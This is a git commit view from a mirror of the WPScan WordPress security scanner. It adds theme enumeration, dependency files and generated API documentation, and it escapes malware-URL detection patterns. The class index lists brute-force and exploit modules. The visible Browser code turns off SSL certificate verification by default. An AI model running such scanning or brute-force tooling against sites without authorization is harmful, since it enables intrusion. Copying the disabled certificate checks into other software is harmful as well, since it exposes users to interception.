garfield/wpscan
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge pull request #35 from FireFart/themes

Browse Source 
New features
This commit is contained in:
erwanlr
2012-09-25 11:16:43 -07:00
parent 9e293b3e32 30fa90987c
commit 417dd5a413
183 changed files with 25997 additions and 3691 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored
View File

@@ -3,3 +3,4 @@ coverage
.DS_Store
.DS_Store?
*.sublime-*
.idea

1
CREDITS
View File

@@ -15,3 +15,4 @@ michee08 - Reported and gave potential solutions to bugs.
Callum Pember - Implemented proxy support - callumpember at gmail.com
g0tmi1k - Additional timthumb checks + bug reports.
Melvin Lammerts - Reported a couple of fake vulnerabilities - melvin at 12k.nl
Christian Mehlmauer - @_FireFart_ - Theme enumeration

7
Gemfile Normal file
View File

@@ -0,0 +1,7 @@
source "https://rubygems.org"
gem "typhoeus"
gem "rspec", :require => "spec"
gem "nokogiri"
gem "webmock"
gem "simplecov"

38
Gemfile.lock Normal file
View File

@@ -0,0 +1,38 @@
GEM
remote: https://rubygems.org/
specs:
addressable (2.3.2)
crack (0.3.1)
diff-lcs (1.1.3)
ffi (1.1.5)
mime-types (1.19)
multi_json (1.3.6)
nokogiri (1.5.5)
rspec (2.11.0)
rspec-core (~> 2.11.0)
rspec-expectations (~> 2.11.0)
rspec-mocks (~> 2.11.0)
rspec-core (2.11.1)
rspec-expectations (2.11.3)
diff-lcs (~> 1.1.3)
rspec-mocks (2.11.3)
simplecov (0.6.4)
multi_json (~> 1.0)
simplecov-html (~> 0.5.3)
simplecov-html (0.5.3)
typhoeus (0.4.2)
ffi (~> 1.0)
mime-types (~> 1.18)
webmock (1.8.10)
addressable (>= 2.2.7)
crack (>= 0.1.7)
PLATFORMS
ruby
DEPENDENCIES
nokogiri
rspec
simplecov
typhoeus
webmock

4
data/malwares.txt
View File

@@ -1,3 +1,3 @@
http://.*.rr.nu
http://www.thesea.org/media.php
http://.*\.rr\.nu
http://www\.thesea\.org/media\.php

4891
data/timthumbs.txt
View File

File diff suppressed because it is too large Load Diff

2
data/wp_versions.xml
View File

@@ -18,7 +18,7 @@ You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
ryandewhurst at gmail
-->
<!--
This file contains identification data to identify WordPress verions.
http://wordpress.org/download/release-archive/

300
doc/Array.html Normal file
View File

@@ -0,0 +1,300 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: Array</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/common_helper_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/common_helper.rb">lib/common_helper.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-_grep_">#_grep_</a></li>
<li><a href="#method-i-grep">#grep</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">Array</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="_grep_-method" class="method-detail ">
<a name="method-i-_grep_"></a>
<div class="method-heading">
<span class="method-name">_grep_</span><span
class="method-args">(regexp)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Fix for grep with symbols in ruby &lt;= 1.8.7</p>
<div class="method-source-code" id="_grep_-source">
<pre>
<span class="ruby-comment"># File lib/common_helper.rb, line 82</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">_grep_</span>(<span class="ruby-identifier">regexp</span>)
<span class="ruby-identifier">matches</span> = []
<span class="ruby-keyword">self</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">value</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">value</span> = <span class="ruby-identifier">value</span>.<span class="ruby-identifier">to_s</span>
<span class="ruby-identifier">matches</span> <span class="ruby-operator">&lt;&lt;</span> <span class="ruby-identifier">value</span> <span class="ruby-keyword">if</span> <span class="ruby-identifier">value</span>.<span class="ruby-identifier">match</span>(<span class="ruby-identifier">regexp</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">matches</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- _grep_-source -->
</div>
<div class="aliases">
Also aliased as: <a href="Array.html#method-i-grep">grep</a>
</div>
</div><!-- _grep_-method -->
<div id="grep-method" class="method-detail method-alias">
<a name="method-i-grep"></a>
<div class="method-heading">
<span class="method-name">grep</span><span
class="method-args">(regexp)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
</div>
<div class="aliases">
Alias for: <a href="Array.html#method-i-_grep_">_grep_</a>
</div>
</div><!-- grep-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

699
doc/Browser.html Normal file
View File

@@ -0,0 +1,699 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: Browser</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/browser_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/browser.rb">lib/browser.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-instance">::instance</a></li>
<li><a href="#method-c-reset">::reset</a></li>
<li><a href="#method-i-forge_request">#forge_request</a></li>
<li><a href="#method-i-get">#get</a></li>
<li><a href="#method-i-load_config">#load_config</a></li>
<li><a href="#method-i-max_threads-3D">#max_threads=</a></li>
<li><a href="#method-i-merge_request_params">#merge_request_params</a></li>
<li><a href="#method-i-post">#post</a></li>
<li><a href="#method-i-user_agent">#user_agent</a></li>
<li><a href="#method-i-user_agent_mode-3D">#user_agent_mode=</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">Browser</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Constants -->
<div id="constants-list" class="section">
<h3 class="section-header">Constants</h3>
<dl>
<dt><a name="ACCESSOR_OPTIONS">ACCESSOR_OPTIONS</a></dt>
<dd class="description"></dd>
<dt><a name="USER_AGENT_MODES">USER_AGENT_MODES</a></dt>
<dd class="description"></dd>
</dl>
</div>
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="config_file-attribute-method" class="method-detail">
<a name="config_file"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">config_file</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="hydra-attribute-method" class="method-detail">
<a name="hydra"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">hydra</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="instance-method" class="method-detail ">
<a name="method-c-instance"></a>
<div class="method-heading">
<span class="method-name">instance</span><span
class="method-args">(options = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="instance-source">
<pre>
<span class="ruby-comment"># File lib/browser.rb, line 58</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">instance</span>(<span class="ruby-identifier">options</span> = {})
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">@@instance</span>
<span class="ruby-identifier">@@instance</span> = <span class="ruby-identifier">new</span>(<span class="ruby-identifier">options</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">@@instance</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- instance-source -->
</div>
</div><!-- instance-method -->
<div id="reset-method" class="method-detail ">
<a name="method-c-reset"></a>
<div class="method-heading">
<span class="method-name">reset</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="reset-source">
<pre>
<span class="ruby-comment"># File lib/browser.rb, line 65</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">reset</span>
<span class="ruby-identifier">@@instance</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- reset-source -->
</div>
</div><!-- reset-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="forge_request-method" class="method-detail ">
<a name="method-i-forge_request"></a>
<div class="method-heading">
<span class="method-name">forge_request</span><span
class="method-args">(url, params = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="forge_request-source">
<pre>
<span class="ruby-comment"># File lib/browser.rb, line 142</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">forge_request</span>(<span class="ruby-identifier">url</span>, <span class="ruby-identifier">params</span> = {})
<span class="ruby-constant">Typhoeus</span><span class="ruby-operator">::</span><span class="ruby-constant">Request</span>.<span class="ruby-identifier">new</span>(
<span class="ruby-identifier">url</span>.<span class="ruby-identifier">to_s</span>,
<span class="ruby-identifier">merge_request_params</span>(<span class="ruby-identifier">params</span>)
)
<span class="ruby-keyword">end</span></pre>
</div><!-- forge_request-source -->
</div>
</div><!-- forge_request-method -->
<div id="get-method" class="method-detail ">
<a name="method-i-get"></a>
<div class="method-heading">
<span class="method-name">get</span><span
class="method-args">(url, params = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="get-source">
<pre>
<span class="ruby-comment"># File lib/browser.rb, line 130</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get</span>(<span class="ruby-identifier">url</span>, <span class="ruby-identifier">params</span> = {})
<span class="ruby-identifier">run_request</span>(
<span class="ruby-identifier">forge_request</span>(<span class="ruby-identifier">url</span>, <span class="ruby-identifier">params</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-value">:method</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">:get</span>))
)
<span class="ruby-keyword">end</span></pre>
</div><!-- get-source -->
</div>
</div><!-- get-method -->
<div id="load_config-method" class="method-detail ">
<a name="method-i-load_config"></a>
<div class="method-heading">
<span class="method-name">load_config</span><span
class="method-args">(config_file = nil)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>TODO reload hydra (if the .<a
href="Browser.html#method-i-load_config">load_config</a> is called on a
browser object, hydra will not have the new @max_threads and
@request_timeout)</p>
<div class="method-source-code" id="load_config-source">
<pre>
<span class="ruby-comment"># File lib/browser.rb, line 102</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">load_config</span>(<span class="ruby-identifier">config_file</span> = <span class="ruby-keyword">nil</span>)
<span class="ruby-ivar">@config_file</span> = <span class="ruby-identifier">config_file</span> <span class="ruby-operator">||</span> <span class="ruby-ivar">@config_file</span>
<span class="ruby-identifier">data</span> = <span class="ruby-constant">JSON</span>.<span class="ruby-identifier">parse</span>(<span class="ruby-constant">File</span>.<span class="ruby-identifier">read</span>(<span class="ruby-ivar">@config_file</span>))
<span class="ruby-constant">ACCESSOR_OPTIONS</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">option</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">option_name</span> = <span class="ruby-identifier">option</span>.<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">self</span>.<span class="ruby-identifier">send</span>(<span class="ruby-value">:&quot;#{option_name}=&quot;</span>, <span class="ruby-identifier">data</span>[<span class="ruby-identifier">option_name</span>])
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- load_config-source -->
</div>
</div><!-- load_config-method -->
<div id="max_threads-3D-method" class="method-detail ">
<a name="method-i-max_threads-3D"></a>
<div class="method-heading">
<span class="method-name">max_threads=</span><span
class="method-args">(max_threads)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="max_threads-3D-source">
<pre>
<span class="ruby-comment"># File lib/browser.rb, line 94</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">max_threads=</span>(<span class="ruby-identifier">max_threads</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">max_threads</span>.<span class="ruby-identifier">nil?</span> <span class="ruby-keyword">or</span> <span class="ruby-identifier">max_threads</span> <span class="ruby-operator">&lt;=</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">max_threads</span> = <span class="ruby-value">1</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@max_threads</span> = <span class="ruby-identifier">max_threads</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- max_threads-3D-source -->
</div>
</div><!-- max_threads-3D-method -->
<div id="merge_request_params-method" class="method-detail ">
<a name="method-i-merge_request_params"></a>
<div class="method-heading">
<span class="method-name">merge_request_params</span><span
class="method-args">(params = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="merge_request_params-source">
<pre>
<span class="ruby-comment"># File lib/browser.rb, line 149</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">merge_request_params</span>(<span class="ruby-identifier">params</span> = {})
<span class="ruby-keyword">if</span> <span class="ruby-ivar">@proxy</span>
<span class="ruby-identifier">params</span> = <span class="ruby-identifier">params</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-value">:proxy</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@proxy</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">params</span>.<span class="ruby-identifier">has_key?</span>(<span class="ruby-value">:disable_ssl_host_verification</span>)
<span class="ruby-identifier">params</span> = <span class="ruby-identifier">params</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-value">:disable_ssl_host_verification</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-keyword">true</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">params</span>.<span class="ruby-identifier">has_key?</span>(<span class="ruby-value">:disable_ssl_peer_verification</span>)
<span class="ruby-identifier">params</span> = <span class="ruby-identifier">params</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-value">:disable_ssl_peer_verification</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-keyword">true</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">if</span> <span class="ruby-operator">!</span><span class="ruby-identifier">params</span>.<span class="ruby-identifier">has_key?</span>(<span class="ruby-value">:headers</span>)
<span class="ruby-identifier">params</span> = <span class="ruby-identifier">params</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-value">:headers</span> =<span class="ruby-operator">&gt;</span> {<span class="ruby-string">'user-agent'</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">user_agent</span>})
<span class="ruby-keyword">elsif</span> <span class="ruby-operator">!</span><span class="ruby-identifier">params</span>[<span class="ruby-value">:headers</span>].<span class="ruby-identifier">has_key?</span>(<span class="ruby-string">'user-agent'</span>)
<span class="ruby-identifier">params</span>[<span class="ruby-value">:headers</span>][<span class="ruby-string">'user-agent'</span>] = <span class="ruby-keyword">self</span>.<span class="ruby-identifier">user_agent</span>
<span class="ruby-keyword">end</span>
<span class="ruby-comment"># Used to enable the cache system if :cache_timeout &gt; 0</span>
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">params</span>.<span class="ruby-identifier">has_key?</span>(<span class="ruby-value">:cache_timeout</span>)
<span class="ruby-identifier">params</span> = <span class="ruby-identifier">params</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-value">:cache_timeout</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@cache_timeout</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">params</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- merge_request_params-source -->
</div>
</div><!-- merge_request_params-method -->
<div id="post-method" class="method-detail ">
<a name="method-i-post"></a>
<div class="method-heading">
<span class="method-name">post</span><span
class="method-args">(url, params = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="post-source">
<pre>
<span class="ruby-comment"># File lib/browser.rb, line 136</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">post</span>(<span class="ruby-identifier">url</span>, <span class="ruby-identifier">params</span> = {})
<span class="ruby-identifier">run_request</span>(
<span class="ruby-identifier">forge_request</span>(<span class="ruby-identifier">url</span>, <span class="ruby-identifier">params</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-value">:method</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-value">:post</span>))
)
<span class="ruby-keyword">end</span></pre>
</div><!-- post-source -->
</div>
</div><!-- post-method -->
<div id="user_agent-method" class="method-detail ">
<a name="method-i-user_agent"></a>
<div class="method-heading">
<span class="method-name">user_agent</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>return the user agent, according to the user_agent_mode</p>
<div class="method-source-code" id="user_agent-source">
<pre>
<span class="ruby-comment"># File lib/browser.rb, line 82</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">user_agent</span>
<span class="ruby-keyword">case</span> <span class="ruby-ivar">@user_agent_mode</span>
<span class="ruby-keyword">when</span> <span class="ruby-string">&quot;semi-static&quot;</span>
<span class="ruby-keyword">unless</span> <span class="ruby-ivar">@user_agent</span>
<span class="ruby-ivar">@user_agent</span> = <span class="ruby-ivar">@available_user_agents</span>.<span class="ruby-identifier">sample</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">when</span> <span class="ruby-string">&quot;random&quot;</span>
<span class="ruby-ivar">@user_agent</span> = <span class="ruby-ivar">@available_user_agents</span>.<span class="ruby-identifier">sample</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@user_agent</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- user_agent-source -->
</div>
</div><!-- user_agent-method -->
<div id="user_agent_mode-3D-method" class="method-detail ">
<a name="method-i-user_agent_mode-3D"></a>
<div class="method-heading">
<span class="method-name">user_agent_mode=</span><span
class="method-args">(ua_mode)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="user_agent_mode-3D-source">
<pre>
<span class="ruby-comment"># File lib/browser.rb, line 69</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">user_agent_mode=</span>(<span class="ruby-identifier">ua_mode</span>)
<span class="ruby-identifier">ua_mode</span> <span class="ruby-operator">||=</span> <span class="ruby-string">&quot;static&quot;</span>
<span class="ruby-keyword">if</span> <span class="ruby-constant">USER_AGENT_MODES</span>.<span class="ruby-identifier">include?</span>(<span class="ruby-identifier">ua_mode</span>)
<span class="ruby-ivar">@user_agent_mode</span> = <span class="ruby-identifier">ua_mode</span>
<span class="ruby-comment"># For semi-static user agent mode, the user agent has to be nil the first time (it will be set with the getter)</span>
<span class="ruby-ivar">@user_agent</span> = <span class="ruby-keyword">nil</span> <span class="ruby-keyword">if</span> <span class="ruby-identifier">ua_mode</span> <span class="ruby-operator">===</span> <span class="ruby-string">&quot;semi-static&quot;</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">raise</span> <span class="ruby-node">&quot;Unknow user agent mode : '#{ua_mode}'&quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- user_agent_mode-3D-source -->
</div>
</div><!-- user_agent_mode-3D-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

380
doc/BruteForce.html Normal file
View File

@@ -0,0 +1,380 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Module: BruteForce</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="module">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/modules/brute_force_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/modules/brute_force.rb">lib/wpscan/modules/brute_force.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-lines_in_file">::lines_in_file</a></li>
<li><a href="#method-i-brute_force">#brute_force</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
